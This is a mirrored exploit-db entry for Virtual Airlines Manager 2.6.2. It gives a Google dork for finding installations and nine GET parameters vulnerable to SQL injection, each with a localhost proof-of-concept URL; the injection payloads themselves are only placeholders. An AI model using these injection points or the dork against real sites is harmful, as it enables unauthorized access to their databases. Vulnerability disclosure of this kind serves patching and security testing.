bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50634.txt
Offensive Security 1472d8e723 DB: 2022-01-06 
32 changes to exploits/shellcodes

Siemens S7 Layer 2 - Denial of Service (DoS)
TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
Automox Agent 32 - Local Privilege Escalation
ConnectWise Control 19.2.24707 - Username Enumeration
Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
AWebServer GhostBuilding 18 - Denial of Service (DoS)
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
Dixell XWEB 500 - Arbitrary File Write
Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
CMSimple 5.4 - Cross Site Scripting (XSS)
RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)
WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)
WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection
Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)
Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)
Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)
Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)
SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)
Nettmp NNT 5.1 - SQLi Authentication Bypass
Hostel Management System 2.1 - Cross Site Scripting (XSS)
Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)
BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
Hospitals Patient Records Management System 1.0 - Account TakeOver
Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
Vodafone H-500-s 3.5.10 - WiFi Password Disclosure
openSIS Student Information System 8.0 - 'multiple' SQL Injection
Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
2022-01-06 05:01:54 +00:00

35 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection
# Google Dork: Powered by Virtual Airlines Manager [v2.6.2]
# Date: 2021-12-30
# Exploit Author: Milad Karimi
# Vendor Homepage: http://virtualairlinesmanager.net
# Software Link: https://virtualairlinesmanager.net/index.php/vam-releases/
# Version: 2.6.2
# Tested on: Ubuntu 19.04
[1] Vulnerable GET parameter: notam_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=notam&notam_id=[SQLi]
[2] Vulnerable GET parameter: airport=[SQLi]
[PoC] http://localhost/vam/index.php?page=airport_info&airport=[SQLi]
[3] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[4] Vulnerable GET parameter: plane_location=[SQLi]
[PoC] http://localhost/vam/index.php?page=fleet_public&plane_location=[SQLi]
[5] Vulnerable GET parameter: hub_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=hub&hub_id=[SQLi]
[6] Vulnerable GET parameter: pilot_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=pilot_details&pilot_id=[SQLi]
[7] Vulnerable GET parameter: registry_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=plane_info_public&registry_id=[SQLi]
[8] Vulnerable GET parameter: event_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=event&event_id=[SQLi]
[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]
Reference in a new issue View git blame Copy permalink